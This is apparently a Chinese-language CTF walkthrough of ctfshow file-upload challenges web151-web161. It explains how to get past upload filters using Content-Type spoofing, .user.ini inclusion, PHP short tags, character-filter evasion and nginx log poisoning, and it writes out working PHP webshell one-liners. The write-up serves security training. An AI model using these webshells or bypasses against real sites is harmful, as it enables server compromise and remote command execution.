ctfshow-文件上传(web151-web161)

web151

web152

web153

web154

web155

web156

web157

web158

web159

web160

web161

web151

提示前台验证不可靠那限制条件估计就是在前端设置的

上传php小马后弹出了窗口说不支持的格式

查看源码

这一条很关键这种不懂直接ai搜意思就是限制了上传类型允许的后缀格式为png

我们直接修改并且上传小马

给出了上传路径访问传参即可得出flag

方法二因为是前端验证嘛

修改小马后缀为png bp抓包修改回来也可以

web152

提示后端管的严

就算把前端允许的格式修改为php也不行后端返回个报错信息文件类型不允许

抓包修改类型为PNG

Content-Type: application/octet-stream

修改为

Content-Type: image/png

成功

获取flag

web153

依旧显示文件类型不合规

修改类型不行了

修改后缀也不行那么估计就是对文件内容进行检测了在文件的内容前加入PNG头标识也不行

可能即使后端判断后缀太严格只要是.php就不行

发现upload下有个index.php文件那就可以使用.user.ini的方式了

php.ini是php的配置文件定义全局的 .user.ini也是配置文件作用与目录的优先级比全局配置文件高前提是当前目录下有php文件那么在.user.ini配置文件定义当前目录所有php文件包含一个指定的php文件即可但是这个指定的php文件也需要我们上传我们无法上传php 才想到的.user.ini 所以包含一个txt文件也可以的只要是txt文件内容是php内容文件包含过来就会解析txt里面的php内容

首先上传.user.ini文件内容为auto_append_file=1.txt

首先就是前端允许类型为ini这样通过前端后端修改类型为image/png通过后端要记得在user.ini前增加一个. 必须在bp中增加(在本地.开头可能会不让) 因为全称就是.user.ini

上传txt文件

依旧是先绕过前端后端文件类型修改为image/png

访问/upload即可并传入post参数为我们的命令

web154

以上一题的方法试一下

.user.ini文件成功上传

但是txt文件上传失败说是文件内容不可以

经过测试只要是文件中存在php就不可以

使用php短标签格式即可

获取flag

web155

同web154

使用蚁剑连接查看过滤源码发现确实过滤了php并且过滤文件的内容以及判断类型

web156

同web154

区别文件内容又过滤了[] 导致小马不能用换成{}即可

<?=eval($_POST[1]);?>

<?=eval($_POST{1});?>

注意判断过滤什么使用二分法一半一半测试

web157

同web154

额外多过滤了{}以及;号不影响直接删除即可

因为在php中最后一个;可以不用写

上一题去除分号即可

{}问题如何解决多学一个姿势POST不给参数也可以

一句话木马为 <?=eval(array_pop($_POST));?>

去除分号<?=eval(array_pop($_POST))?>

意思就是弹出post最后一对键值对的值从而php解析这个值从而达到执行命令

web158

使用web157即可

web159

文件内容()不让用了那就不能写一句话木马了

还有什么方式呢那就是首先ini文件包含一个1.txt文件 1.txt文件的php内容为包含U-A日志文件

/var/log/nginx/access.log 然后U-A 添加一句话木马即可这个log也被过滤了使用 . 拼接即可

.user.ini 内容为 auto_append_file=1.txt

1.txt内容为 <?=include '/var/l'.'og/nginx/access.l'.'og'?>

添加U-A值 <?php eval($_POST[1]); ?>

目前来说日志确实被包含了但是内容太多手动执行命令不好找并且也不确定一句话是否被写入日志中使用蚁剑连接测试即可

成功

找到了flag

既然已经使用蚁剑进行连接了那就看看这几关后端是怎么过滤的吧

后端过滤脚本

可以看到文件内容过滤了 php ( [ { ; log

并且验证文件类型是否为image/png 以及后缀是否是php

web160

文件内容过滤了空格很容易我们将空格换成换行符0a即可不能再post中直接写%0a 那个url的写法先用1进行占位再hex中找到1对应的31 修改为0a即可

web161

经过bp测试不让上传ini后缀的文件了 txt也不行 png也不行估计是白名单？

我重新来直接在页面中上传png图片结果也说图片不合规这是啥都不让上传？

真有意思前端允许类型是png 后端却不可以了

经过测试后缀只要不是php就可以文件类型必须要是png 文件头内容必须是GIF头(并且光有头不行还必须要有内容)

既然知道这样了按照上一题

上传.user.ini 内容为 auto_append_file=1.txt

上传1.txt内容为 <?=include '/var/l'.'og/nginx/access.l'.'og'?>(过滤了空格记得替换09等)

添加U-A值 <?php eval($_POST[1]); ?>

并且文件内容前必须要加上GIF的头字段（我查看源码也不明白原因有个函数获取该文件大小也就是说文件头要和文件对应才会返回真这个GIF文件头组合任意内容该函数都会返回真这是我的理解）

确定包含日志

蚁剑连接成功确实木马写入查找flag